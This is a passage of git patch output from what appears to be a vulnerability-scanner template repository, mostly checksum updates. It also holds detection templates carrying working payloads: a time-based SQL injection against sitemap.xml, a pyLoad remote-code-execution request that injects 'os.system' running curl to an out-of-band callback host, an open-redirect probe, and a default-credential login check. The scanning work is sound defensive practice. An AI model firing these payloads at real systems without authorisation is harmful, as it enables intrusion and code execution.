+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc +http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b +http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 +http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a +http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/updraftplus.yaml:581d99c9e67beb70a5e5c360d55e56a4f0e55619 +http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 +http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e +http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 +http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 +http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 +http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6501,7 +6501,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:26c415e1e2a3a0c3610d9155bd361a7ab77c5f3a +templates-checksum.txt:8491852ee70b2e0160fec1d079417d5e20b19a90 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From a757b9b7ac758db474c5fcb6e0048ca0873314a4 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 6 Jul 2023 12:30:22 +0530 Subject: [PATCH 412/609] minor -changes --- .../sitemap-sql-detector.yaml | 21 ---------------- .../sitemap-sql-injection.yaml | 25 +++++++++++++++++++ 2 files changed, 25 insertions(+), 21 deletions(-) delete mode 100644 http/misconfiguration/sitemap-sql-detector.yaml create mode 100644 http/misconfiguration/sitemap-sql-injection.yaml diff --git a/http/misconfiguration/sitemap-sql-detector.yaml b/http/misconfiguration/sitemap-sql-detector.yaml deleted file mode 100644 index 31ab3c881d..0000000000 --- a/http/misconfiguration/sitemap-sql-detector.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: sql-injection - -info: - name: Sitemap - SQL Injection - author: Aravind - severity: high - tags: misconfig,sitemap,sqli - -http: - - raw: - - | - @timeout: 15s - POST /sitemap.xml?offset=1;SELECT IF((SLEEP(9)),1,2356)# HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: dsl - dsl: - - 'duration>=9' - - 'status_code == 200' - condition: and diff --git a/http/misconfiguration/sitemap-sql-injection.yaml b/http/misconfiguration/sitemap-sql-injection.yaml new file mode 100644 index 0000000000..b869d01d72 --- /dev/null +++ b/http/misconfiguration/sitemap-sql-injection.yaml @@ -0,0 +1,25 @@ +id: sitemap-sql-injection + +info: + name: Sitemap - SQL Injection + author: Aravind + severity: high + reference: https://twitter.com/GodfatherOrwa/status/1647406811216072705?t=fbn0Eu34euKdrn4fL8UqfQ&s=19 + metadata: + google-query: intext:"sitemap" filetype:txt, filetype:xml inurl:sitemap + tags: misconfig,sitemap,sqli + +http: + - raw: + - | + @timeout: 15s + POST /sitemap.xml?offset=1;SELECT IF((SLEEP(6)),1,2356)# HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(header, "application/xml") && contains(body, "sitemap>")' + condition: and \ No newline at end of file From d51553abb60544239b56e7e597f25a274fdee8f3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 6 Jul 2023 07:02:48 +0000 Subject: [PATCH 414/609] Auto Generated Templates Checksum [Thu Jul 6 07:02:48 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9ff574ab92..52bcc16dbe 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3368,7 +3368,7 @@ http/exposures/apis/wadl-api.yaml:f07f4ce36505a6b991361f0f2d641f19eced1de7 http/exposures/apis/wsdl-api.yaml:d5879ee63561edeeef160c76f97d20e8bbc3fd29 http/exposures/backups/exposed-mysql-initial.yaml:6fb47cc5711b4169c4d1b5483eb1b11c612e4188 http/exposures/backups/froxlor-database-backup.yaml:658b10d96b864b5640cf024f53bc60c4fe9a88de -http/exposures/backups/php-backup-files.yaml:c4b298deae3422675321617b6964ecc383555d9c +http/exposures/backups/php-backup-files.yaml:791781e3a221771c3e5c7faf57a0d5b1a512827d http/exposures/backups/settings-php-files.yaml:860643f9412c55514b9ae4116e0a2af7057a73fe http/exposures/backups/sql-dump.yaml:c6ec38fd60027e96dd0a11aba259b6b4c12471bf http/exposures/backups/zip-backup-files.yaml:82137415c02501e07a0e61bedb99bc86ea5e6a50 @@ -6501,7 +6501,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:8491852ee70b2e0160fec1d079417d5e20b19a90 +templates-checksum.txt:fd2bd1c98bda5b2994f4ee7d79ad50310eceff0c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 1f8010273d9eae2f29d034f51c7c52c2594ec57b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 6 Jul 2023 07:04:08 +0000 Subject: [PATCH 415/609] TemplateMan Update [Thu Jul 6 07:04:08 UTC 2023] :robot: --- http/exposures/backups/php-backup-files.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml index c9c7a321d6..ef3cdff27b 100644 --- a/http/exposures/backups/php-backup-files.yaml +++ b/http/exposures/backups/php-backup-files.yaml @@ -4,9 +4,9 @@ info: name: PHP Source - Backup File Information Disclosure author: StreetOfHackerR007,pwnhxl,mastercho severity: medium - tags: exposure,backup,php,disclosure,fuzz metadata: - max-request: 1025 + max-request: 1170 + tags: exposure,backup,php,disclosure,fuzz http: - method: GET From 0c11eb2a149ef4b8713e1312530f02b5b6886566 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 6 Jul 2023 14:18:51 +0530 Subject: [PATCH 416/609] minor -changes --- http/cves/2012/CVE-2012-5321.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index 16f166f839..560502e29a 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -1,7 +1,7 @@ id: CVE-2012-5321 info: - name: TikiWiki CMS/Groupware v8.3 - Open Redirect + name: TikiWiki CMS Groupware v8.3 - Open Redirect author: ctflearner severity: medium description: | @@ -12,17 +12,19 @@ info: - http://st2tea.blogspot.com/2012/02/tiki-wiki-cms-groupware-frame-injection.html - https://exchange.xforce.ibmcloud.com/vulnerabilities/73403 classification: - cvss-metrics: (AV:N/AC:M/Au:N/C:P/I:P/A:N) + cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-5321 cwe-id: CWE-20 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* - tags: cve,cve2012,redirect,TikiWiki,CMS/Groupware + metadata: + shodan-query: http.html:"tiki wiki" + tags: cve,cve2012,redirect,tikiwiki,groupware http: - method: GET path: - - "{{BaseURL}}/tiki-featured_link.php?type=f&url=http://interact.sh" + - "{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh" matchers: - type: regex From def35f6b48f3b2b0d0d370886594bf5253276c6f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Jul 2023 16:00:31 +0530 Subject: [PATCH 417/609] re-wrote template --- http/cves/2023/CVE-2023-0297.yaml | 69 ++++++++++++++++++++++--------- 1 file changed, 49 insertions(+), 20 deletions(-) diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index 7650a9483d..0a5381e5f8 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -1,21 +1,50 @@ -id: python-code-injection -info: - name: Python Code Injection - author: MrHarshvardhan - severity: medium +id: CVE-2023-0297 + +info: + name: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE) + author: MrHarshvardhan,DhiyaneshDk + severity: critical description: | - Template to detect Python code injection vulnerabilities. - reference: xxx -requests: - - method: GET - path: - - /flash/addcrypted2 - attacks: - - raw: - headers: - Content-type: application/x-www-form-urlencoded - body: jk=pyimport%20os;os.system("{{cmd}}");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa - predicates: - - type: status - status: - - 200 + Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31. + reference: + - https://www.exploit-db.com/exploits/51532 + - https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1058 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-0297 + cwe-id: CWE-94 + cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + shodan-query: html:"pyload" + tags: huntr,cve,cve2023,rce,pyload,oast + +variables: + cmd: "curl {{interactsh-url}}" + +http: + - raw: + - | + GET /flash/addcrypted2 HTTP/1.1 + Host: {{Hostname}} + + - | + POST /flash/addcrypted2 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + jk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw + + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - 'JDownloader' + + - type: word + part: interactsh_protocol + words: + - "dns" From 03b1f956c861b50426e05b7274374b48b6c2df8a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Jul 2023 16:04:40 +0530 Subject: [PATCH 418/609] trail space fix --- http/cves/2023/CVE-2023-0297.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index 0a5381e5f8..1479bbda50 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -1,6 +1,6 @@ id: CVE-2023-0297 -info: +info: name: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE) author: MrHarshvardhan,DhiyaneshDk severity: critical From bb937aa670e820270b503a1ac5495d7b90573438 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Jul 2023 16:22:36 +0530 Subject: [PATCH 419/609] Pyload Panel & Default Login --- .../pyload/pyload-default-login.yaml | 43 +++++++++++++++++++ http/exposed-panels/pyload-panel.yaml | 34 +++++++++++++++ 2 files changed, 77 insertions(+) create mode 100644 http/default-logins/pyload/pyload-default-login.yaml create mode 100644 http/exposed-panels/pyload-panel.yaml diff --git a/http/default-logins/pyload/pyload-default-login.yaml b/http/default-logins/pyload/pyload-default-login.yaml new file mode 100644 index 0000000000..4144e01583 --- /dev/null +++ b/http/default-logins/pyload/pyload-default-login.yaml @@ -0,0 +1,43 @@ +id: pyload-default-login + +info: + name: PyLoad Default Login + author: DhiyaneshDk + severity: high + description: | + PyLoad Default Credentials were discovered. + reference: + - https://pypi.org/project/pyload-ng/#:~:text=Default%20username%3A%20pyload%20.,Default%20password%3A%20pyload%20. + metadata: + max-request: 1 + shodan-query: html:"pyload" + verified: true + tags: default-login,pyload + +http: + - raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + + do=login&username={{username}}&password={{password}}&submit=Login + + payloads: + username: + - pyload + password: + - pyload + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Set-Cookie: pyload_session=' + + - type: status + status: + - 302 \ No newline at end of file diff --git a/http/exposed-panels/pyload-panel.yaml b/http/exposed-panels/pyload-panel.yaml new file mode 100644 index 0000000000..5807ed9800 --- /dev/null +++ b/http/exposed-panels/pyload-panel.yaml @@ -0,0 +1,34 @@ +id: pyload-panel + +info: + name: PyLoad Login - Panel + author: DhiyaneshDk + severity: info + description: | + A Pyload Login was detected. + reference: + - https://github.com/pyload/pyload + metadata: + max-request: 1 + verified: true + shodan-query: html:"pyload" + tags: panel,pyload,login + + +http: + - method: GET + path: + - "{{BaseURL}}/login" + + host-redirects: true + matchers-condition: and + matchers: + - type: word + words: + - 'Login - pyLoad' + - 'alt="Pyload"' + condition: or + + - type: status + status: + - 200 \ No newline at end of file From 723587502644b6daa786d6c473db18de8410aecd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 6 Jul 2023 17:44:08 +0530 Subject: [PATCH 420/609] Fix FN php-backup-files.yaml --- http/exposures/backups/php-backup-files.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml index ef3cdff27b..944a797cd1 100644 --- a/http/exposures/backups/php-backup-files.yaml +++ b/http/exposures/backups/php-backup-files.yaml @@ -112,6 +112,8 @@ http: - "$_POST[" - "$_REQUEST[" - "$_SERVER[" + - "'DB_PASSWORD'" + - "define('DB_" condition: or - type: word @@ -119,4 +121,5 @@ http: words: - "text/plain" - "bytes" - condition: or \ No newline at end of file + - "text/html" + condition: or From 07307702b6ce90cb1248273f54c2ccf338e9d218 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 6 Jul 2023 17:55:15 +0530 Subject: [PATCH 421/609] updated matcher --- http/exposures/backups/php-backup-files.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml index 944a797cd1..ee8a9f5d52 100644 --- a/http/exposures/backups/php-backup-files.yaml +++ b/http/exposures/backups/php-backup-files.yaml @@ -121,5 +121,4 @@ http: words: - "text/plain" - "bytes" - - "text/html" condition: or From 7098e82a84e4918f77e76c34136f271d0ad84a57 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 6 Jul 2023 12:52:25 +0000 Subject: [PATCH 423/609] Auto Generated Templates Checksum [Thu Jul 6 12:52:25 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 52bcc16dbe..4824eb6601 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3368,7 +3368,7 @@ http/exposures/apis/wadl-api.yaml:f07f4ce36505a6b991361f0f2d641f19eced1de7 http/exposures/apis/wsdl-api.yaml:d5879ee63561edeeef160c76f97d20e8bbc3fd29 http/exposures/backups/exposed-mysql-initial.yaml:6fb47cc5711b4169c4d1b5483eb1b11c612e4188 http/exposures/backups/froxlor-database-backup.yaml:658b10d96b864b5640cf024f53bc60c4fe9a88de -http/exposures/backups/php-backup-files.yaml:791781e3a221771c3e5c7faf57a0d5b1a512827d +http/exposures/backups/php-backup-files.yaml:6cb103c5d1b0411ea1d4dfe7ab76ea9bb091ebb4 http/exposures/backups/settings-php-files.yaml:860643f9412c55514b9ae4116e0a2af7057a73fe http/exposures/backups/sql-dump.yaml:c6ec38fd60027e96dd0a11aba259b6b4c12471bf http/exposures/backups/zip-backup-files.yaml:82137415c02501e07a0e61bedb99bc86ea5e6a50 @@ -6501,7 +6501,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:fd2bd1c98bda5b2994f4ee7d79ad50310eceff0c +templates-checksum.txt:fb1e27d757d0f4c46a98649af2db40f09e228737 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 1f0b5ff1e292df111b44ce26b49682f39406d6cc Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 6 Jul 2023 18:35:00 +0530 Subject: [PATCH 424/609] minor -changes --- headless/unauth-temporal-web-ui.yaml | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/headless/unauth-temporal-web-ui.yaml b/headless/unauth-temporal-web-ui.yaml index c0c8468c1c..6cb32b063f 100644 --- a/headless/unauth-temporal-web-ui.yaml +++ b/headless/unauth-temporal-web-ui.yaml @@ -4,7 +4,8 @@ info: name: Temporal Web UI - Unauthenticated Access author: ggranjus severity: high - description: Temporal Web UI was able to be accessed because no authentication was required + description: | + Temporal Web UI was able to be accessed because no authentication was required reference: - https://docs.temporal.io/web-ui classification: @@ -14,19 +15,18 @@ info: metadata: verified: 'true' shodan-query: http.favicon.hash:557327884 - tags: temporal,unauth,headless -headless: - - steps: - - action: navigate - args: - url: "{{BaseURL}}" - - - action: waitload +http: + - method: GET + path: + - "{{BaseURL}}/favicon.ico" + - "{{BaseURL}}/api/v1/namespaces/default/workflows?query=" + matchers-condition: and matchers: - - part: body - type: word - words: - - "View Recent Workflows" + - type: dsl + dsl: + - "status_code_1 == 200 && (\"44c856843ce2631b1d6968ac11fa9ec4\" == md5(body_1))" + - "contains(body_2, 'nextPageToken') && status_code_2 == 200" + condition: and From 61af35c993c053e66a8dfc061ae28438463708e3 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 6 Jul 2023 19:48:13 +0530 Subject: [PATCH 425/609] Add files via upload --- .../esafenet-cdg-default-login.yaml | 52 +++++++++++++++++++ 1 file changed, 52 